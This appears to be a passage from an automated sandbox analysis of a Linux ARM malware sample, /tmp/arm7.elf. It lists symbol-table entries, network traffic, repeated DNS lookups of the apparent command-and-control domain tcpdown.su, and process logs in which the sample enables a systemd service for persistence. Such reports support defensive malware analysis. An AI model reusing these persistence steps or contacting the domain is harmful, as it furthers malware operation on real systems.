                              __sigaddset.symtab0x1624836FUNC<unknown>DEFAULT2
                              __sigdelset.symtab0x1626c36FUNC<unknown>DEFAULT2
                              __sigismember.symtab0x1622436FUNC<unknown>DEFAULT2
                              __sigjmp_save.symtab0x1ce2064FUNC<unknown>HIDDEN2
                              __sigsetjmp.symtab0x1ca7812FUNC<unknown>DEFAULT2
                              __stdin.symtab0x2a13c4OBJECT<unknown>DEFAULT13
                              __stdio_READ.symtab0x1ccf488FUNC<unknown>HIDDEN2
                              __stdio_WRITE.symtab0x1b150220FUNC<unknown>HIDDEN2
                              __stdio_adjust_position.symtab0x13138200FUNC<unknown>HIDDEN2
                              __stdio_fwrite.symtab0x1b22c320FUNC<unknown>HIDDEN2
                              __stdio_rfill.symtab0x1cd4c48FUNC<unknown>HIDDEN2
                              __stdio_seek.symtab0x1387460FUNC<unknown>HIDDEN2
                              __stdio_trans2r_o.symtab0x1cd7c164FUNC<unknown>HIDDEN2
                              __stdio_trans2w_o.symtab0x1b36c220FUNC<unknown>HIDDEN2
                              __stdio_wcommit.symtab0x1384448FUNC<unknown>HIDDEN2
                              __stdout.symtab0x2a1404OBJECT<unknown>DEFAULT13
                              __subdf3.symtab0x1cfac788FUNC<unknown>HIDDEN2
                              __sys_accept.symtab0x15ae468FUNC<unknown>DEFAULT2
                              __sys_connect.symtab0x15be068FUNC<unknown>DEFAULT2
                              __sys_recv.symtab0x15d6468FUNC<unknown>DEFAULT2
                              __sys_recvfrom.symtab0x15e1872FUNC<unknown>DEFAULT2
                              __sys_send.symtab0x15ee868FUNC<unknown>DEFAULT2
                              __sys_sendto.symtab0x15f9c76FUNC<unknown>DEFAULT2
                              __syscall_error.symtab0x19f9c44FUNC<unknown>HIDDEN2
                              __syscall_error.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              __syscall_fcntl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              __syscall_nanosleep.symtab0x1a44c64FUNC<unknown>DEFAULT2
                              __syscall_rt_sigaction.symtab0x1a08064FUNC<unknown>DEFAULT2
                              __syscall_rt_sigaction.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              __syscall_select.symtab0x120b068FUNC<unknown>DEFAULT2
                              __tls_get_addr.symtab0x1c73036FUNC<unknown>DEFAULT2
                              __uClibc_fini.symtab0x192e8124FUNC<unknown>DEFAULT2
                              __uClibc_init.symtab0x193b888FUNC<unknown>DEFAULT2
                              __uClibc_main.symtab0x194101004FUNC<unknown>DEFAULT2
                              __uClibc_main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              __uclibc_progname.symtab0x2a30c4OBJECT<unknown>HIDDEN13
                              __udivsi3.symtab0x11890252FUNC<unknown>HIDDEN2
                              __write.symtab0x19040100FUNC<unknown>DEFAULT2
                              __write_nocancel.symtab0x1902424FUNC<unknown>DEFAULT2
                              __xpg_strerror_r.symtab0x158dc268FUNC<unknown>DEFAULT2
                              __xpg_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              __xstat32_conv.symtab0x123e4172FUNC<unknown>HIDDEN2
                              __xstat64_conv.symtab0x12318204FUNC<unknown>HIDDEN2
                              _adjust_pos.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              _bss_custom_printf_spec.symtab0x303ac10OBJECT<unknown>DEFAULT14
                              _bss_end__.symtab0x398480NOTYPE<unknown>DEFAULTSHN_ABS
                              _charpad.symtab0x139f484FUNC<unknown>DEFAULT2
                              _cs_funcs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              _custom_printf_arginfo.symtab0x3944440OBJECT<unknown>HIDDEN14
                              _custom_printf_handler.symtab0x3946c40OBJECT<unknown>HIDDEN14
                              _custom_printf_spec.symtab0x2a2144OBJECT<unknown>HIDDEN13
                              _dl_aux_init.symtab0x1c99056FUNC<unknown>DEFAULT2
                              _dl_nothread_init_static_tls.symtab0x1c9c888FUNC<unknown>HIDDEN2
                              _dl_phdr.symtab0x398404OBJECT<unknown>DEFAULT14
                              _dl_phnum.symtab0x398444OBJECT<unknown>DEFAULT14
                              _dl_tls_dtv_gaps.symtab0x398341OBJECT<unknown>DEFAULT14
                              _dl_tls_dtv_slotinfo_list.symtab0x398304OBJECT<unknown>DEFAULT14
                              _dl_tls_generation.symtab0x398384OBJECT<unknown>DEFAULT14
                              _dl_tls_max_dtv_idx.symtab0x398284OBJECT<unknown>DEFAULT14
                              _dl_tls_setup.symtab0x1c6c8104FUNC<unknown>DEFAULT2
                              _dl_tls_static_align.symtab0x398244OBJECT<unknown>DEFAULT14
                              _dl_tls_static_nelem.symtab0x3983c4OBJECT<unknown>DEFAULT14
                              _dl_tls_static_size.symtab0x3982c4OBJECT<unknown>DEFAULT14
                              _dl_tls_static_used.symtab0x398204OBJECT<unknown>DEFAULT14
                              _edata.symtab0x2a3180NOTYPE<unknown>DEFAULTSHN_ABS
                              _end.symtab0x398480NOTYPE<unknown>DEFAULTSHN_ABS
                              _exit.symtab0x1a0c0104FUNC<unknown>DEFAULT2
                              _exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              _fini.symtab0x1edfc0FUNC<unknown>DEFAULT3
                              _fixed_buffers.symtab0x2e3ac8192OBJECT<unknown>DEFAULT14
                              _fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              _fp_out_narrow.symtab0x13a48132FUNC<unknown>DEFAULT2
                              _fpmaxtostr.symtab0x1b6442036FUNC<unknown>HIDDEN2
                              _fpmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              _fwrite.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              _init.symtab0x80d40FUNC<unknown>DEFAULT1
                              _load_inttype.symtab0x1b448116FUNC<unknown>HIDDEN2
                              _load_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              _memcpy.symtab0x114b436FUNC<unknown>DEFAULT2
                              _ppfs_init.symtab0x141c0160FUNC<unknown>HIDDEN2
                              _ppfs_init.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              _ppfs_parsespec.symtab0x144a81392FUNC<unknown>HIDDEN2
                              _ppfs_parsespec.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              _ppfs_prepargs.symtab0x1426068FUNC<unknown>HIDDEN2
                              _ppfs_prepargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              _ppfs_setargs.symtab0x142a4432FUNC<unknown>HIDDEN2
                              _ppfs_setargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              _promoted_size.symtab0x1445484FUNC<unknown>DEFAULT2
                              _pthread_cleanup_pop_restore.symtab0x192bc44FUNC<unknown>DEFAULT2
                              _pthread_cleanup_push_defer.symtab0x192b48FUNC<unknown>DEFAULT2
                              _rfill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                              _setjmp.symtab0x1a0508FUNC<unknown>DEFAULT2
                              _sigintr.symtab0x394948OBJECT<unknown>HIDDEN14
                              _start.symtab0x81940FUNC<unknown>DEFAULT2
                              TimestampSource PortDest PortSource IPDest IP
                              Jan 7, 2025 00:44:23.056401014 CET48202443192.168.2.13185.125.190.26
                              Jan 7, 2025 00:44:54.032480001 CET48202443192.168.2.13185.125.190.26
                              TimestampSource PortDest PortSource IPDest IP
                              Jan 7, 2025 00:44:12.430387020 CET3637753192.168.2.131.1.1.1
                              Jan 7, 2025 00:44:12.449356079 CET53363771.1.1.1192.168.2.13
                              Jan 7, 2025 00:44:12.451881886 CET4956853192.168.2.131.1.1.1
                              Jan 7, 2025 00:44:12.458971024 CET53495681.1.1.1192.168.2.13
                              Jan 7, 2025 00:44:12.460974932 CET6091653192.168.2.131.1.1.1
                              Jan 7, 2025 00:44:12.469343901 CET53609161.1.1.1192.168.2.13
                              Jan 7, 2025 00:44:12.472170115 CET5911553192.168.2.131.1.1.1
                              Jan 7, 2025 00:44:12.486840010 CET53591151.1.1.1192.168.2.13
                              Jan 7, 2025 00:44:12.488670111 CET5363353192.168.2.131.1.1.1
                              Jan 7, 2025 00:44:12.497453928 CET53536331.1.1.1192.168.2.13
                              Jan 7, 2025 00:44:12.498485088 CET4656453192.168.2.131.1.1.1
                              Jan 7, 2025 00:44:12.506448030 CET53465641.1.1.1192.168.2.13
                              Jan 7, 2025 00:44:12.508198977 CET4086953192.168.2.131.1.1.1
                              Jan 7, 2025 00:44:12.523458958 CET53408691.1.1.1192.168.2.13
                              Jan 7, 2025 00:44:12.525441885 CET4658953192.168.2.131.1.1.1
                              Jan 7, 2025 00:44:12.539927006 CET53465891.1.1.1192.168.2.13
                              Jan 7, 2025 00:44:12.543661118 CET3977453192.168.2.131.1.1.1
                              Jan 7, 2025 00:44:12.558252096 CET53397741.1.1.1192.168.2.13
                              Jan 7, 2025 00:44:12.561235905 CET4568953192.168.2.131.1.1.1
                              Jan 7, 2025 00:44:12.570183039 CET53456891.1.1.1192.168.2.13
                              Jan 7, 2025 00:44:13.585621119 CET6028353192.168.2.131.1.1.1
                              Jan 7, 2025 00:44:18.593823910 CET3451153192.168.2.131.1.1.1
                              Jan 7, 2025 00:44:23.598472118 CET5181953192.168.2.131.1.1.1
                              Jan 7, 2025 00:44:28.604232073 CET4433453192.168.2.131.1.1.1
                              Jan 7, 2025 00:44:33.609018087 CET5091953192.168.2.131.1.1.1
                              Jan 7, 2025 00:44:38.612993956 CET3843253192.168.2.131.1.1.1
                              Jan 7, 2025 00:44:38.621001959 CET53384321.1.1.1192.168.2.13
                              Jan 7, 2025 00:44:38.621582031 CET5048453192.168.2.131.1.1.1
                              Jan 7, 2025 00:44:38.640855074 CET53504841.1.1.1192.168.2.13
                              Jan 7, 2025 00:44:38.641429901 CET3934253192.168.2.131.1.1.1
                              Jan 7, 2025 00:44:38.655706882 CET53393421.1.1.1192.168.2.13
                              Jan 7, 2025 00:44:38.656251907 CET4671853192.168.2.131.1.1.1
                              Jan 7, 2025 00:44:38.670087099 CET53467181.1.1.1192.168.2.13
                              Jan 7, 2025 00:44:38.670646906 CET5418953192.168.2.131.1.1.1
                              Jan 7, 2025 00:44:38.685370922 CET53541891.1.1.1192.168.2.13
                              Jan 7, 2025 00:44:43.687223911 CET4191353192.168.2.131.1.1.1
                              Jan 7, 2025 00:44:48.690618038 CET5956653192.168.2.131.1.1.1
                              Jan 7, 2025 00:44:53.694648981 CET4040453192.168.2.131.1.1.1
                              Jan 7, 2025 00:44:58.701083899 CET3844053192.168.2.131.1.1.1
                              Jan 7, 2025 00:45:03.705574989 CET4821953192.168.2.131.1.1.1
                              Jan 7, 2025 00:45:08.709727049 CET4391453192.168.2.131.1.1.1
                              Jan 7, 2025 00:45:08.718277931 CET53439141.1.1.1192.168.2.13
                              Jan 7, 2025 00:45:08.718830109 CET5431253192.168.2.131.1.1.1
                              Jan 7, 2025 00:45:08.727780104 CET53543121.1.1.1192.168.2.13
                              Jan 7, 2025 00:45:08.728300095 CET5852953192.168.2.131.1.1.1
                              Jan 7, 2025 00:45:08.750705957 CET53585291.1.1.1192.168.2.13
                              Jan 7, 2025 00:45:08.751282930 CET5517753192.168.2.131.1.1.1
                              Jan 7, 2025 00:45:08.759773970 CET53551771.1.1.1192.168.2.13
                              Jan 7, 2025 00:45:08.760340929 CET5864153192.168.2.131.1.1.1
                              Jan 7, 2025 00:45:08.768809080 CET53586411.1.1.1192.168.2.13
                              Jan 7, 2025 00:45:12.771279097 CET5014353192.168.2.131.1.1.1
                              Jan 7, 2025 00:45:17.773499012 CET5538353192.168.2.131.1.1.1
                              Jan 7, 2025 00:45:22.777380943 CET5251753192.168.2.131.1.1.1
                              Jan 7, 2025 00:45:27.783082008 CET5177553192.168.2.131.1.1.1
                              Jan 7, 2025 00:45:32.785048008 CET4743453192.168.2.131.1.1.1
                              Jan 7, 2025 00:45:37.789597988 CET3387653192.168.2.131.1.1.1
                              Jan 7, 2025 00:45:37.804132938 CET53338761.1.1.1192.168.2.13
                              Jan 7, 2025 00:45:37.805206060 CET5666153192.168.2.131.1.1.1
                              Jan 7, 2025 00:45:37.818870068 CET53566611.1.1.1192.168.2.13
                              Jan 7, 2025 00:45:37.819860935 CET5854953192.168.2.131.1.1.1
                              Jan 7, 2025 00:45:37.835448980 CET53585491.1.1.1192.168.2.13
                              Jan 7, 2025 00:45:37.836047888 CET4616253192.168.2.131.1.1.1
                              Jan 7, 2025 00:45:37.844692945 CET53461621.1.1.1192.168.2.13
                              Jan 7, 2025 00:45:37.845645905 CET3964153192.168.2.131.1.1.1
                              Jan 7, 2025 00:45:37.860035896 CET53396411.1.1.1192.168.2.13
                              Jan 7, 2025 00:45:41.863267899 CET3693853192.168.2.131.1.1.1
                              Jan 7, 2025 00:45:46.873092890 CET3538453192.168.2.131.1.1.1
                              Jan 7, 2025 00:45:51.877435923 CET3791753192.168.2.131.1.1.1
                              Jan 7, 2025 00:45:56.881143093 CET4796153192.168.2.131.1.1.1
                              Jan 7, 2025 00:46:01.887429953 CET3826653192.168.2.131.1.1.1
                              Jan 7, 2025 00:46:06.893482924 CET5371453192.168.2.131.1.1.1
                              Jan 7, 2025 00:46:07.010190010 CET53537141.1.1.1192.168.2.13
                              Jan 7, 2025 00:46:07.011255980 CET5564153192.168.2.131.1.1.1
                              Jan 7, 2025 00:46:07.030163050 CET53556411.1.1.1192.168.2.13
                              Jan 7, 2025 00:46:07.031297922 CET5331353192.168.2.131.1.1.1
                              Jan 7, 2025 00:46:07.045408010 CET53533131.1.1.1192.168.2.13
                              Jan 7, 2025 00:46:07.046523094 CET4840353192.168.2.131.1.1.1
                              Jan 7, 2025 00:46:07.054970026 CET53484031.1.1.1192.168.2.13
                              Jan 7, 2025 00:46:07.055990934 CET5993753192.168.2.131.1.1.1
                              Jan 7, 2025 00:46:07.062869072 CET53599371.1.1.1192.168.2.13
                              Jan 7, 2025 00:46:11.066096067 CET4666853192.168.2.131.1.1.1
                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Jan 7, 2025 00:44:12.430387020 CET192.168.2.131.1.1.10x39f5Standard query (0)tcpdown.su@A (IP address)IN (0x0001)false
                              Jan 7, 2025 00:44:12.451881886 CET192.168.2.131.1.1.10x39f5Standard query (0)tcpdown.su@A (IP address)IN (0x0001)false
                              Jan 7, 2025 00:44:12.460974932 CET192.168.2.131.1.1.10x39f5Standard query (0)tcpdown.su@A (IP address)IN (0x0001)false
                              Jan 7, 2025 00:44:12.472170115 CET192.168.2.131.1.1.10x39f5Standard query (0)tcpdown.su@A (IP address)IN (0x0001)false
                              Jan 7, 2025 00:44:12.488670111 CET192.168.2.131.1.1.10x39f5Standard query (0)tcpdown.su@A (IP address)IN (0x0001)false
                              Jan 7, 2025 00:44:12.498485088 CET192.168.2.131.1.1.10xc34cStandard query (0)tcpdown.suoA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:44:12.508198977 CET192.168.2.131.1.1.10xc34cStandard query (0)tcpdown.suoA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:44:12.525441885 CET192.168.2.131.1.1.10xc34cStandard query (0)tcpdown.suoA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:44:12.543661118 CET192.168.2.131.1.1.10xc34cStandard query (0)tcpdown.suoA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:44:12.561235905 CET192.168.2.131.1.1.10xc34cStandard query (0)tcpdown.suoA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:44:13.585621119 CET192.168.2.131.1.1.10x3185Standard query (0)tcpdown.su0256false
                              Jan 7, 2025 00:44:18.593823910 CET192.168.2.131.1.1.10x3185Standard query (0)tcpdown.su0256false
                              Jan 7, 2025 00:44:23.598472118 CET192.168.2.131.1.1.10x3185Standard query (0)tcpdown.su0256false
                              Jan 7, 2025 00:44:28.604232073 CET192.168.2.131.1.1.10x3185Standard query (0)tcpdown.su0256false
                              Jan 7, 2025 00:44:33.609018087 CET192.168.2.131.1.1.10x3185Standard query (0)tcpdown.su0256false
                              Jan 7, 2025 00:44:38.612993956 CET192.168.2.131.1.1.10xc33fStandard query (0)tcpdown.suoA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:44:38.621582031 CET192.168.2.131.1.1.10xc33fStandard query (0)tcpdown.suoA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:44:38.641429901 CET192.168.2.131.1.1.10xc33fStandard query (0)tcpdown.suoA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:44:38.656251907 CET192.168.2.131.1.1.10xc33fStandard query (0)tcpdown.suoA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:44:38.670646906 CET192.168.2.131.1.1.10xc33fStandard query (0)tcpdown.suoA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:44:43.687223911 CET192.168.2.131.1.1.10xa672Standard query (0)tcpdown.su0256false
                              Jan 7, 2025 00:44:48.690618038 CET192.168.2.131.1.1.10xa672Standard query (0)tcpdown.su0256false
                              Jan 7, 2025 00:44:53.694648981 CET192.168.2.131.1.1.10xa672Standard query (0)tcpdown.su0256false
                              Jan 7, 2025 00:44:58.701083899 CET192.168.2.131.1.1.10xa672Standard query (0)tcpdown.su0256false
                              Jan 7, 2025 00:45:03.705574989 CET192.168.2.131.1.1.10xa672Standard query (0)tcpdown.su0256false
                              Jan 7, 2025 00:45:08.709727049 CET192.168.2.131.1.1.10x5369Standard query (0)tcpdown.suoA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:45:08.718830109 CET192.168.2.131.1.1.10x5369Standard query (0)tcpdown.suoA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:45:08.728300095 CET192.168.2.131.1.1.10x5369Standard query (0)tcpdown.suoA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:45:08.751282930 CET192.168.2.131.1.1.10x5369Standard query (0)tcpdown.suoA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:45:08.760340929 CET192.168.2.131.1.1.10x5369Standard query (0)tcpdown.suoA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:45:12.771279097 CET192.168.2.131.1.1.10x8857Standard query (0)tcpdown.su0256false
                              Jan 7, 2025 00:45:17.773499012 CET192.168.2.131.1.1.10x8857Standard query (0)tcpdown.su0256false
                              Jan 7, 2025 00:45:22.777380943 CET192.168.2.131.1.1.10x8857Standard query (0)tcpdown.su0256false
                              Jan 7, 2025 00:45:27.783082008 CET192.168.2.131.1.1.10x8857Standard query (0)tcpdown.su0256false
                              Jan 7, 2025 00:45:32.785048008 CET192.168.2.131.1.1.10x8857Standard query (0)tcpdown.su0256false
                              Jan 7, 2025 00:45:37.789597988 CET192.168.2.131.1.1.10xa3e3Standard query (0)tcpdown.suoA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:45:37.805206060 CET192.168.2.131.1.1.10xa3e3Standard query (0)tcpdown.suoA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:45:37.819860935 CET192.168.2.131.1.1.10xa3e3Standard query (0)tcpdown.suoA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:45:37.836047888 CET192.168.2.131.1.1.10xa3e3Standard query (0)tcpdown.suoA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:45:37.845645905 CET192.168.2.131.1.1.10xa3e3Standard query (0)tcpdown.suoA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:45:41.863267899 CET192.168.2.131.1.1.10x6055Standard query (0)tcpdown.su0256false
                              Jan 7, 2025 00:45:46.873092890 CET192.168.2.131.1.1.10x6055Standard query (0)tcpdown.su0256false
                              Jan 7, 2025 00:45:51.877435923 CET192.168.2.131.1.1.10x6055Standard query (0)tcpdown.su0256false
                              Jan 7, 2025 00:45:56.881143093 CET192.168.2.131.1.1.10x6055Standard query (0)tcpdown.su0256false
                              Jan 7, 2025 00:46:01.887429953 CET192.168.2.131.1.1.10x6055Standard query (0)tcpdown.su0256false
                              Jan 7, 2025 00:46:06.893482924 CET192.168.2.131.1.1.10xfd2fStandard query (0)tcpdown.suoA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:46:07.011255980 CET192.168.2.131.1.1.10xfd2fStandard query (0)tcpdown.suoA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:46:07.031297922 CET192.168.2.131.1.1.10xfd2fStandard query (0)tcpdown.suoA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:46:07.046523094 CET192.168.2.131.1.1.10xfd2fStandard query (0)tcpdown.suoA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:46:07.055990934 CET192.168.2.131.1.1.10xfd2fStandard query (0)tcpdown.suoA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:46:11.066096067 CET192.168.2.131.1.1.10xd28fStandard query (0)tcpdown.su0256false
                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Jan 7, 2025 00:44:12.449356079 CET1.1.1.1192.168.2.130x39f5Name error (3)tcpdown.su@nonenoneA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:44:12.458971024 CET1.1.1.1192.168.2.130x39f5Name error (3)tcpdown.su@nonenoneA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:44:12.469343901 CET1.1.1.1192.168.2.130x39f5Name error (3)tcpdown.su@nonenoneA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:44:12.486840010 CET1.1.1.1192.168.2.130x39f5Name error (3)tcpdown.su@nonenoneA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:44:12.497453928 CET1.1.1.1192.168.2.130x39f5Name error (3)tcpdown.su@nonenoneA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:44:12.506448030 CET1.1.1.1192.168.2.130xc34cName error (3)tcpdown.suononenoneA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:44:12.523458958 CET1.1.1.1192.168.2.130xc34cName error (3)tcpdown.suononenoneA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:44:12.539927006 CET1.1.1.1192.168.2.130xc34cName error (3)tcpdown.suononenoneA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:44:12.558252096 CET1.1.1.1192.168.2.130xc34cName error (3)tcpdown.suononenoneA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:44:12.570183039 CET1.1.1.1192.168.2.130xc34cName error (3)tcpdown.suononenoneA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:44:38.621001959 CET1.1.1.1192.168.2.130xc33fName error (3)tcpdown.suononenoneA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:44:38.640855074 CET1.1.1.1192.168.2.130xc33fName error (3)tcpdown.suononenoneA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:44:38.655706882 CET1.1.1.1192.168.2.130xc33fName error (3)tcpdown.suononenoneA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:44:38.670087099 CET1.1.1.1192.168.2.130xc33fName error (3)tcpdown.suononenoneA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:44:38.685370922 CET1.1.1.1192.168.2.130xc33fName error (3)tcpdown.suononenoneA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:45:08.718277931 CET1.1.1.1192.168.2.130x5369Name error (3)tcpdown.suononenoneA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:45:08.727780104 CET1.1.1.1192.168.2.130x5369Name error (3)tcpdown.suononenoneA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:45:08.750705957 CET1.1.1.1192.168.2.130x5369Name error (3)tcpdown.suononenoneA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:45:08.759773970 CET1.1.1.1192.168.2.130x5369Name error (3)tcpdown.suononenoneA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:45:08.768809080 CET1.1.1.1192.168.2.130x5369Name error (3)tcpdown.suononenoneA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:45:37.804132938 CET1.1.1.1192.168.2.130xa3e3Name error (3)tcpdown.suononenoneA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:45:37.818870068 CET1.1.1.1192.168.2.130xa3e3Name error (3)tcpdown.suononenoneA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:45:37.835448980 CET1.1.1.1192.168.2.130xa3e3Name error (3)tcpdown.suononenoneA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:45:37.844692945 CET1.1.1.1192.168.2.130xa3e3Name error (3)tcpdown.suononenoneA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:45:37.860035896 CET1.1.1.1192.168.2.130xa3e3Name error (3)tcpdown.suononenoneA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:46:07.010190010 CET1.1.1.1192.168.2.130xfd2fName error (3)tcpdown.suononenoneA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:46:07.030163050 CET1.1.1.1192.168.2.130xfd2fName error (3)tcpdown.suononenoneA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:46:07.045408010 CET1.1.1.1192.168.2.130xfd2fName error (3)tcpdown.suononenoneA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:46:07.054970026 CET1.1.1.1192.168.2.130xfd2fName error (3)tcpdown.suononenoneA (IP address)IN (0x0001)false
                              Jan 7, 2025 00:46:07.062869072 CET1.1.1.1192.168.2.130xfd2fName error (3)tcpdown.suononenoneA (IP address)IN (0x0001)false

                              System Behavior

                              Start time (UTC):23:44:09
                              Start date (UTC):06/01/2025
                              Path:/tmp/arm7.elf
                              Arguments:/tmp/arm7.elf
                              File size:4956856 bytes
                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                              Start time (UTC):23:44:10
                              Start date (UTC):06/01/2025
                              Path:/tmp/arm7.elf
                              Arguments:-
                              File size:4956856 bytes
                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                              Start time (UTC):23:44:10
                              Start date (UTC):06/01/2025
                              Path:/tmp/arm7.elf
                              Arguments:-
                              File size:4956856 bytes
                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                              Start time (UTC):23:44:10
                              Start date (UTC):06/01/2025
                              Path:/tmp/arm7.elf
                              Arguments:-
                              File size:4956856 bytes
                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                              Start time (UTC):23:44:10
                              Start date (UTC):06/01/2025
                              Path:/tmp/arm7.elf
                              Arguments:-
                              File size:4956856 bytes
                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                              Start time (UTC):23:44:10
                              Start date (UTC):06/01/2025
                              Path:/tmp/arm7.elf
                              Arguments:-
                              File size:4956856 bytes
                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                              Start time (UTC):23:44:10
                              Start date (UTC):06/01/2025
                              Path:/bin/sh
                              Arguments:/bin/sh -c "systemctl daemon-reload"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):23:44:10
                              Start date (UTC):06/01/2025
                              Path:/bin/sh
                              Arguments:-
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):23:44:10
                              Start date (UTC):06/01/2025
                              Path:/usr/bin/systemctl
                              Arguments:systemctl daemon-reload
                              File size:996584 bytes
                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                              Start time (UTC):23:44:10
                              Start date (UTC):06/01/2025
                              Path:/tmp/arm7.elf
                              Arguments:-
                              File size:4956856 bytes
                              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                              Start time (UTC):23:44:10
                              Start date (UTC):06/01/2025
                              Path:/bin/sh
                              Arguments:/bin/sh -c "systemctl enable startup_command.service"
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):23:44:10
                              Start date (UTC):06/01/2025
                              Path:/bin/sh
                              Arguments:-
                              File size:129816 bytes
                              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                              Start time (UTC):23:44:10
                              Start date (UTC):06/01/2025
                              Path:/usr/bin/systemctl
                              Arguments:systemctl enable startup_command.service
                              File size:996584 bytes
                              MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                              Start time (UTC):23:44:10
                              Start date (UTC):06/01/2025
                              Path:/usr/lib/systemd/systemd
                              Arguments:-
                              File size:1620224 bytes
                              MD5 hash:9b2bec7092a40488108543f9334aab75

                              Start time (UTC):23:44:10
                              Start date (UTC):06/01/2025
                              Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                              Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                              File size:22760 bytes
                              MD5 hash:3633b075f40283ec938a2a6a89671b0e

                              Start time (UTC):23:44:11
                              Start date (UTC):06/01/2025
                              Path:/usr/lib/systemd/systemd
                              Arguments:-
                              File size:1620224 bytes
                              MD5 hash:9b2bec7092a40488108543f9334aab75

                              Start time (UTC):23:44:11
                              Start date (UTC):06/01/2025
                              Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                              Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                              File size:22760 bytes
                              MD5 hash:3633b075f40283ec938a2a6a89671b0e